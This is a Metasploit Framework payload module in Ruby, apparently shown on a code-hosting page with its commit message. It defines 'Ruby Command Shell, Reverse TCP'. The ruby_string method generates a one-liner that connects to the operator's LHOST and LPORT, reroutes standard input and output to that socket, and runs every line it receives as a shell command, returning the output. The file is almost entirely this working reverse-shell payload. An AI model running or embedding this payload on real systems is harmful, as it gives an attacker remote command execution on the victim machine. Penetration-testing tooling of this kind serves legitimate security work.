Tod Beardsley
be39079830
Note that this commit needed a --no-verify because of the erroneous check in msftidy for writing to stdout. The particular syntax of this payload makes it look like we're doing that when we're really not. So don't sweat it.
47 lines
1.5 KiB
Ruby
47 lines
1.5 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'msf/core/payload/ruby'
|
|
require 'msf/core/handler/reverse_tcp'
|
|
require 'msf/base/sessions/command_shell'
|
|
require 'msf/base/sessions/command_shell_options'
|
|
|
|
module Metasploit3
|
|
|
|
include Msf::Payload::Single
|
|
include Msf::Payload::Ruby
|
|
include Msf::Sessions::CommandShellOptions
|
|
|
|
def initialize(info = {})
|
|
super(merge_info(info,
|
|
'Name' => 'Ruby Command Shell, Reverse TCP',
|
|
'Description' => 'Connect back and create a command shell via Ruby',
|
|
'Author' => [ 'kris katterjohn', 'hdm' ],
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => 'ruby',
|
|
'Arch' => ARCH_RUBY,
|
|
'Handler' => Msf::Handler::ReverseTcp,
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
'PayloadType' => 'ruby',
|
|
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
|
))
|
|
end
|
|
|
|
def generate
|
|
return prepends(ruby_string)
|
|
end
|
|
|
|
def ruby_string
|
|
lhost = datastore['LHOST']
|
|
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
|
"require 'socket';c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" +
|
|
"$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" +
|
|
"(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }"
|
|
end
|
|
end
|